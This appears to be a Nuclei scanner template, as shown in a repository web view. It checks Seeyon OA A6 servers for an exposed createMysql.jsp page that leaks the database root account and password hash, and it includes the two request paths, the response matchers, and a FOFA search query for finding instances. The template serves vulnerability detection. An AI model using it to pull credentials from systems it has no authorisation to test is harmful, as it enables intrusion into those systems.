nuclei-templates/http/vulnerabilities/seeyon/seeyon-createmysql-exposure...

43 lines
1.4 KiB
YAML
Raw Permalink Normal View History

2023-09-18 12:37:42 +00:00
id: seeyon-createmysql-exposure
info:
2023-09-18 12:37:42 +00:00
name: Seeyon OA A6 createMysql.jsp Database - Information Disclosure
author: SleepingBag945
severity: medium
description: |
Seeyon OA A6 has leaked sensitive database information. An attacker can obtain the database account and password MD5 by accessing a specific URL.
reference:
- https://github.com/achuna33/MYExploit/blob/8ffbf7ee60cbd77ad90b0831b93846aba224ab29/src/main/java/com/achuna33/Controllers/SeeyonController.java
- https://github.com/Threekiii/Awesome-POC/blob/master/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E8%87%B4%E8%BF%9COA%20A6%20createMysql.jsp%20%E6%95%B0%E6%8D%AE%E5%BA%93%E6%95%8F%E6%84%9F%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2.md
metadata:
verified: true
2023-10-14 11:27:55 +00:00
max-request: 2
fofa-query: title="致远A8+协同管理软件.A6"
tags: seeyon,oa,info-leak
http:
- method: GET
path:
- "{{BaseURL}}/yyoa/createMysql.jsp"
- "{{BaseURL}}/yyoa/ext/createMysql.jsp"
stop-at-first-match: true
2023-10-14 11:27:55 +00:00
matchers-condition: and
matchers:
- type: word
part: body
words:
- "root</br>"
- type: regex
part: body
regex:
- "[*][0-zA-Z]{40}</br>"
- type: status
status:
2023-10-14 11:27:55 +00:00
- 200
# digest: 4a0a00473045022100ee9988573daed066e9deadae2dddf213a5fd2325a44738ffc07d7ab96b3bd05102200ec1fe8f49e272746f2100a627d4a08d9a7a556c875629d32b68b86f11314cba:922c64590222798bb761d5b6d8e72950